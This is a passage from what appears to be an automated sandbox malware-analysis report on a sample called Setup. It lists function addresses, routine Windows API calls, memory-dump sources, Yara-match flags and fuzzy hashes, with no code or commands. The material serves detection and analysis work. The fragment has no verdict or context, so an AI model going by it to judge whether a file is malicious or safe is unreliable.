                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: N
                                                                                                                                                                                                                                                      • API String ID: 0-1130791706
                                                                                                                                                                                                                                                      • Opcode ID: 58757ba106b21956a6eeddc4af205380699ae7c40982fc24df9ef30f333cd911
                                                                                                                                                                                                                                                      • Instruction ID: 387445442626d99006b7202ab1fbaacec157d0f5c6434aa59b2b06e6111dea58
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58757ba106b21956a6eeddc4af205380699ae7c40982fc24df9ef30f333cd911
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5622AE71D0428C9FDB09DBA4C958BEDBB75EF15300F548169E941A7381EF706E48CBA1
                                                                                                                                                                                                                                                      Function 02D42F77 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: R
                                                                                                                                                                                                                                                      • API String ID: 0-1466425173
                                                                                                                                                                                                                                                      • Opcode ID: a90d592a102a8f0576e06fefeebdcd72a088291c0db64ace4a3dd1eda32cb3f6
                                                                                                                                                                                                                                                      • Instruction ID: dfdbd36a6a712a9a74c86ddd7ce0e2be91244087c6fdb58b4ba257fd3c3f2a0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a90d592a102a8f0576e06fefeebdcd72a088291c0db64ace4a3dd1eda32cb3f6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D229170D0428CDFDB15DBA8C954BEDBBB5EF15300F20859AD446A7381EB74AE48CBA1
                                                                                                                                                                                                                                                      Function 031D79C0 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,031D79BB,?,?,00000008,?,?,031E1BFF,00000000), ref: 031D7BED
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                                      • Opcode ID: 28babef3ebb3a18ea7cdc7d201f9ebb91afa94db4a26dd4e0487d9876728bc82
                                                                                                                                                                                                                                                      • Instruction ID: bf635d6cbb6190fafac589db96f42c26fcd2d0c34e63af4e8293df75c72ec378
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28babef3ebb3a18ea7cdc7d201f9ebb91afa94db4a26dd4e0487d9876728bc82
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AB12F31210609DFD719CF28C486B65BBE1FF4A365F298658E899CF2E1C336E991CB40
                                                                                                                                                                                                                                                      Function 02D4AD74 Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-979431602
                                                                                                                                                                                                                                                      • Opcode ID: 88c8eb64c07f54aaf9b3649bdffc31d12cca5f976e420dc2a685f28ae98a0ca6
                                                                                                                                                                                                                                                      • Instruction ID: 1cf59e9cdcea19909cfc92c00ce3e2e2ef1da4b77f144f9685bbbb56cee4fcd0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88c8eb64c07f54aaf9b3649bdffc31d12cca5f976e420dc2a685f28ae98a0ca6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0328B70D012689FDB15DF64C944BEDBBB1AF55308F2482DAE448BB281DBB46E84CF91
                                                                                                                                                                                                                                                      Function 031A7BA4 Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 031A7BBA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                                                      • Opcode ID: 809b40bba1799ba06bb564eb4de4ddbdeb5db55bb64d0011d50401ea7205f89e
                                                                                                                                                                                                                                                      • Instruction ID: 11177fd7912d7398f96788ba0fbf7b4006aaeaba47d4c0ddf82e0ddf60fe564b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 809b40bba1799ba06bb564eb4de4ddbdeb5db55bb64d0011d50401ea7205f89e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E091D3B5904601CFDB18CF98E58966DB7B1FB4D328F28C52AD445EB38AD3389948CF90
                                                                                                                                                                                                                                                      Function 031A71D0 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                                                                                                      • Opcode ID: 24ea046262f7f9c1416c7b796d9ccbccf506721e32500c920a1f1440b6cfd1db
                                                                                                                                                                                                                                                      • Instruction ID: 4519dffb450a527671f586f8eec5848dfb44b7c4d8bbf73e055da4d70cd827f8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24ea046262f7f9c1416c7b796d9ccbccf506721e32500c920a1f1440b6cfd1db
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B261AF758006189BCB20DFA4CC89BD9B7B4EF08714F1442D9E559AB291EB706BC5CF90
                                                                                                                                                                                                                                                      Function 031750F0 Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 0-3772416878
                                                                                                                                                                                                                                                      • Opcode ID: 55b061acdf784708f3619e65e023b8b5fc30240fc71fdb34a314c06675c5c47c
                                                                                                                                                                                                                                                      • Instruction ID: 76b1b94c118e48ce35fa725df10fd8b980d974fbce9d68a71ce16a82152dfd48
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55b061acdf784708f3619e65e023b8b5fc30240fc71fdb34a314c06675c5c47c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFE19131A0526A9BCB24CB58CC407ECFB71AF1A300F4842EAD859A7642D7719E94CFA1
                                                                                                                                                                                                                                                      Function 02D268D4 Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 0-3772416878
                                                                                                                                                                                                                                                      • Opcode ID: 0f11cef8659e58014098d17c6d0e9095f664197e8d5b10cab50c6b643f040214
                                                                                                                                                                                                                                                      • Instruction ID: 55c5aae479d2b14dcbdacbf44ca21f4193b9f3a304192f8f2a7549aef9a47a34
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f11cef8659e58014098d17c6d0e9095f664197e8d5b10cab50c6b643f040214
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FE17071A0126A8BCB24CB58CC407EDBB70EF25304F5442EAD859A7782D7709E98CFA1
                                                                                                                                                                                                                                                      Function 031CB209 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 24a3dd2a27535b0ee045272cf6d12444a9e787cc83d805f9451551a4ea144a24
                                                                                                                                                                                                                                                      • Instruction ID: 5237e0addb860a0aafd8e7886fb36be9702d59ee1ea924a133793e2560f3c07e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24a3dd2a27535b0ee045272cf6d12444a9e787cc83d805f9451551a4ea144a24
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFC1EE3452C6C68FCB28CE68C5866BEFBB5AF6D300F08C64DD492DB691C371A945CB91
                                                                                                                                                                                                                                                      Function 031DC000 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DC054
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                                      • Opcode ID: b39ce97ff9118116f321813d9c7aa171934aa2f3bae8c5155b201e33ac24e6af
                                                                                                                                                                                                                                                      • Instruction ID: 8f904f7316e5d10bedc0836b662e2e00c013e5ea7f0c07e4bd7e1cf526197e35
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b39ce97ff9118116f321813d9c7aa171934aa2f3bae8c5155b201e33ac24e6af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD21D77A610206ABDB28EE64EC41E7A73ADEF0E310B14447AED02CB140EB34D944CB91
                                                                                                                                                                                                                                                      Function 02D7C9ED Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 0692d355fcf3cb6575e9487dd30f04021db30b2eafde17781c6b7aae12dcb265
                                                                                                                                                                                                                                                      • Instruction ID: d818e2d24ea8131873787ef0a01cc9c1f47a39dff98a2c0321cf9007ffdbebef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0692d355fcf3cb6575e9487dd30f04021db30b2eafde17781c6b7aae12dcb265
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66C1F1709246068FCB24CF28C5946BABBB2EF05318F18465FD892977A1F339ED45CB61
                                                                                                                                                                                                                                                      Function 031DBC72 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(031DBDA0,00000001), ref: 031DBCE4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                      • Opcode ID: 1fa20c28cabfcd98518252376755317cd6d9b9a37218967bee500a75262d3427
                                                                                                                                                                                                                                                      • Instruction ID: 38b2e215f1c590db8c298239d994090d459431e2d90deefb985c00b758459b19
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fa20c28cabfcd98518252376755317cd6d9b9a37218967bee500a75262d3427
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC11293A2047059FDB18EF39C89057BB791FF89359B19842DD94747A40D771A542C740
                                                                                                                                                                                                                                                      Function 031DC22F Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20000001,?,00000002,?,00000000,?,?,031DBFBC,00000000,00000000,?), ref: 031DC25B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                                      • Opcode ID: cc719754b09d8fc3a0a26d4ff2c94814c114c6d45f23a9cb16f3f29a1c06c840
                                                                                                                                                                                                                                                      • Instruction ID: f194771e6cdc52900324dd08cb320f32bac2bf9d45128c657d70d1bfc7c12bd7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc719754b09d8fc3a0a26d4ff2c94814c114c6d45f23a9cb16f3f29a1c06c840
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3601D636600212ABDB2CEAA58C45AFB7768DB4E764F094C29DC07E7590EB30EE41C6D0
                                                                                                                                                                                                                                                      Function 031DBD0D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(031DC000,00000001), ref: 031DBD57
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                      • Opcode ID: 583d40acb1ca559ce86c5ce59fad9bccc4bf7c8bfaf9b17f2f725cb5c68eb01c
                                                                                                                                                                                                                                                      • Instruction ID: 77025047f0b7165826fd33bb288828910f2e70cac86b7fc1328c7bedaae54bf5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 583d40acb1ca559ce86c5ce59fad9bccc4bf7c8bfaf9b17f2f725cb5c68eb01c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0463A2047085FCB24EF35DC80A7ABB95EF8A72CF0A842DE9024B690C7B19C02C650
                                                                                                                                                                                                                                                      Function 031BEE33 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,031B36E0,00000000,?,00000004,031B02C9,?,00000004,031B1351,00000000,00000000), ref: 031BEE50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                      • Opcode ID: fba8d677509ac5e08e41ed7beaf4549ecd039ef3b70fa47ee7d6ec63e5728e72
                                                                                                                                                                                                                                                      • Instruction ID: 747f4aa8a7f41df260075973d9fd5d525e47dccf5b653f4580e5ff60bf26e180
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fba8d677509ac5e08e41ed7beaf4549ecd039ef3b70fa47ee7d6ec63e5728e72
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91E06526690201B7DB29DB78E91EFE6B6A89705609F448545F502D90C5DBA0C6109171
                                                                                                                                                                                                                                                      Function 031D3C8D Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031CF5B1: RtlEnterCriticalSection.NTDLL(?), ref: 031CF5C0
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(Function_00062C80,00000001,03203468,0000000C,031D40B5,?), ref: 031D3CC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                                      • Opcode ID: a44482264cbbd94c9da43dda7b25beb7bb2679a567d585e7e7e5fd6963bdb5c3
                                                                                                                                                                                                                                                      • Instruction ID: d1350d154c71845157b8c3146f1cf56d9d85e49161c08cd48c8b6c7530fe7249
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a44482264cbbd94c9da43dda7b25beb7bb2679a567d585e7e7e5fd6963bdb5c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F0497AA50304EFD700EFA8E445B9CB7B0EB0D725F10801AE9209B291C77589048F91
                                                                                                                                                                                                                                                      Function 031DBC27 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(031DBB80,00000001), ref: 031DBC5E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                      • Opcode ID: 90f356502c3437992cf5a9ce6e3a143d13156788a325bb92bce03339047ea9ac
                                                                                                                                                                                                                                                      • Instruction ID: 25bed63f7d62d132d51fdc7140b82e26786ec5f5e54bfc430919ae6793d3a5de
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90f356502c3437992cf5a9ce6e3a143d13156788a325bb92bce03339047ea9ac
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F05C3930020557CB04DF35D85576A7F94EFC6710B4B805DEA068F250C7729942C790
                                                                                                                                                                                                                                                      Function 031D4210 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,031CF087,?,20001004,00000000,00000002,?,?,031CE679), ref: 031D4244
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                      • Opcode ID: 3f5d96a39e1c604ced70a3f5e2a201ab35153be2db2a1994e460fa0345f7ad52
                                                                                                                                                                                                                                                      • Instruction ID: 4cefbcd42bfe9ddce9184c4a581332fd86daee11487e598ffc84206b6fe55027
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f5d96a39e1c604ced70a3f5e2a201ab35153be2db2a1994e460fa0345f7ad52
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E0483A500228BBCF166F51EC04E9E7F25EF5D751F054010FC055A124CF7289619AD5
                                                                                                                                                                                                                                                      Function 031A803E Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00037050,031A79C5), ref: 031A8043
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                      • Opcode ID: 4daf39b4262b79b2c0840f5694894b22a7eee124c32cbb0d16c69d7b1d41646f
                                                                                                                                                                                                                                                      • Instruction ID: 8fbb699878254e759d9e6701b99828dac6cec27046c258ae653756a3c0ec5ae1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4daf39b4262b79b2c0840f5694894b22a7eee124c32cbb0d16c69d7b1d41646f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                      Function 02D20001 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: x)
                                                                                                                                                                                                                                                      • API String ID: 0-19961359
                                                                                                                                                                                                                                                      • Opcode ID: 65e4d646a40ed02bd1ec093920f8669160df1d546fb7074b5b70d6377109b032
